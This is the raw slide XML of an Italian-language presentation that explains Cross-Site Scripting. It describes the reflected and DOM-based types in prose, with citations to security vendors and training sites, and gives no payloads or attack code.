          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="7000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HK Modular"/>
                <a:ea typeface="HK Modular"/>
                <a:cs typeface="HK Modular"/>
                <a:sym typeface="HK Modular"/>
              </a:rPr>
              <a:t>Cross-Site Scripting: XSS </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr name="Picture 20" id="20"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="true"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1365791" y="4682954"/>
            <a:ext cx="1707108" cy="995813"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 21" id="21"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1508050" y="5698433"/>
            <a:ext cx="1422590" cy="839216"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2246"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1604">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Reflected XSS (Non Persistente)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 22" id="22"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1349839" y="7000811"/>
            <a:ext cx="8843305" cy="1868805"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r">
              <a:lnSpc>
                <a:spcPts val="2520"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Questo è il tipo di XSS più comune. Il payload malevolo è riflesso immediatamente dal server nella risposta HTTP, senza essere memorizzato. Gli attacchi riflessi vengono spesso condotti tramite link maligni inviati tramite phishing o social engineering. Questo tipo di attacco richiede che ogni vittima riceva il link infetto, rendendolo non persistente​ (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
                <a:hlinkClick r:id="rId6" tooltip="https://www.splunk.com/en_us/blog/learn/cross-site-scripting-xss-attacks.html"/>
              </a:rPr>
              <a:t>Spl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
                <a:hlinkClick r:id="rId7" tooltip="https://www.splunk.com/en_us/blog/learn/cross-site-scripting-xss-attacks.html"/>
              </a:rPr>
              <a:t>unk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>)​​ (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
                <a:hlinkClick r:id="rId8" tooltip="https://www.infosecinstitute.com/resources/security-awareness/owasp-3-cross-site-scripting-xss/"/>
              </a:rPr>
              <a:t>Infosec Institute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>)​.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r">
              <a:lnSpc>
                <a:spcPts val="2520"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 23" id="23"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1508050" y="4013365"/>
            <a:ext cx="8685095" cy="264160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2239"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1599" spc="548">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>PERCENTUALE DI UTILIZZO (DATI AGGIORNATI AL 2023)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 24" id="24"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="1508050" y="3827688"/>
            <a:ext cx="8685095" cy="99952"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="6179589" cy="71118"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 25" id="25"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="6179589" cy="71118"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="71118" w="6179589">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6179589" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6179589" y="71118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="71118"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="ABDB2A"/>
            </a:solidFill>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 26" id="26"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-28575"/>
              <a:ext cx="6179589" cy="99693"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr" rtlCol="false" tIns="50800" lIns="50800" bIns="50800" rIns="50800"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="2239"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 27" id="27"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="1508050" y="4394500"/>
            <a:ext cx="8685095" cy="99952"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="6179589" cy="71118"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 28" id="28"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="6179589" cy="71118"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="71118" w="6179589">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6179589" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6179589" y="71118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="71118"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="ABDB2A"/>
            </a:solidFill>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 29" id="29"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-28575"/>
              <a:ext cx="6179589" cy="99693"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr" rtlCol="false" tIns="50800" lIns="50800" bIns="50800" rIns="50800"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="2239"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 30" id="30"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="1349839" y="6802845"/>
            <a:ext cx="8843305" cy="47625"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="6292158" cy="33886"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 31" id="31"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="6292159" cy="33886"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="33886" w="6292159">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6292159" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6292159" y="33886"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="33886"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="ABDB2A"/>
            </a:solidFill>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 32" id="32"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-28575"/>
              <a:ext cx="6292158" cy="62461"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr" rtlCol="false" tIns="50800" lIns="50800" bIns="50800" rIns="50800"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="2239"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 33" id="33"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="3753821" y="5126933"/>
            <a:ext cx="5923348" cy="790575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2100"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans Bold Italics"/>
                <a:ea typeface="Open Sans Bold Italics"/>
                <a:cs typeface="Open Sans Bold Italics"/>
                <a:sym typeface="Open Sans Bold Italics"/>
              </a:rPr>
              <a:t>Esempio</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans Italics"/>
                <a:ea typeface="Open Sans Italics"/>
                <a:cs typeface="Open Sans Italics"/>
                <a:sym typeface="Open Sans Italics"/>
              </a:rPr>
              <a:t>: Un utente riceve un link malevolo via email o social media che include uno script iniettato.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans Italics"/>
                <a:ea typeface="Open Sans Italics"/>
                <a:cs typeface="Open Sans Italics"/>
                <a:sym typeface="Open Sans Italics"/>
              </a:rPr>
              <a:t>Quando clicca sul link, lo script viene eseguito nel suo browser.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3" id="3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="17488106" y="9502973"/>
            <a:ext cx="402082" cy="402082"/>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6" id="6"/>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7" id="7"/>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06</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 8" id="8"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 9" id="9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="13686739" y="0"/>
            <a:ext cx="4601261" cy="7702881"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="3273873" cy="5480727"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 10" id="10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="3273873" cy="5480727"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="5480727" w="3273873">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3273873" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3273873" y="5480727"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="5480727"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="ABDB2A"/>
            </a:solidFill>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 11" id="11"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-28575"/>
              <a:ext cx="3273873" cy="5509302"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr" rtlCol="false" tIns="50800" lIns="50800" bIns="50800" rIns="50800"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="2239"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 12" id="12"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="10700814" y="1731709"/>
            <a:ext cx="5971851" cy="4915002"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="7962468" cy="6553336"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr name="Picture 13" id="13"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="true"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:srcRect l="9448" t="0" r="9448" b="0"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false">
              <a:off x="0" y="0"/>
              <a:ext cx="7962468" cy="6553336"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 14" id="14"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="10700814" y="6850470"/>
            <a:ext cx="5971851" cy="1704821"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="7962468" cy="2273094"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr name="Picture 15" id="15"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="true"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:srcRect l="0" t="29681" r="0" b="27469"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false">
              <a:off x="0" y="0"/>
              <a:ext cx="7962468" cy="2273094"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 16" id="16"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="10309798" y="1276167"/>
            <a:ext cx="782032" cy="3118333"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="556429" cy="2218746"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 17" id="17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="556429" cy="2218746"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="2218746" w="556429">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="556429" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="556429" y="2218746"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2218746"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="ABDB2A">
                <a:alpha val="74902"/>
              </a:srgbClr>
            </a:solidFill>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 18" id="18"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-28575"/>
              <a:ext cx="556429" cy="2247321"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr" rtlCol="false" tIns="50800" lIns="50800" bIns="50800" rIns="50800"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="2239"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 19" id="19"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1944265" y="914400"/>
            <a:ext cx="6922007" cy="2644775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="7000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HK Modular"/>
                <a:ea typeface="HK Modular"/>
                <a:cs typeface="HK Modular"/>
                <a:sym typeface="HK Modular"/>
              </a:rPr>
              <a:t>Cross-Site Scripting: XSS </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr name="Picture 20" id="20"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="true"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1365791" y="4516236"/>
            <a:ext cx="1707108" cy="995813"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 21" id="21"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1508050" y="5576974"/>
            <a:ext cx="1422590" cy="555419"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2246"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1604">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>DOM-based XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 22" id="22"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1349839" y="6911353"/>
            <a:ext cx="8843305" cy="1554480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r">
              <a:lnSpc>
                <a:spcPts val="2520"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t> Questa tecnica è più avanzata e sfrutta vulnerabilità nel codice JavaScript lato client. Lo script malevolo viene eseguito direttamente nel browser della vittima, manipolando il Document Object Model (DOM) senza interazione con il server. Questo tipo di XSS è difficile da rilevare con i firewall e i log del server poiché il payload non viene mai inviato al server​ (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
                <a:hlinkClick r:id="rId6" tooltip="https://www.acunetix.com/websitesecurity/xss/"/>
              </a:rPr>
              <a:t>Acunetix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>)​​ (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
                <a:hlinkClick r:id="rId7" tooltip="https://www.infosecinstitute.com/resources/security-awareness/owasp-3-cross-site-scripting-xss/"/>
              </a:rPr>
              <a:t>Infosec Institute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
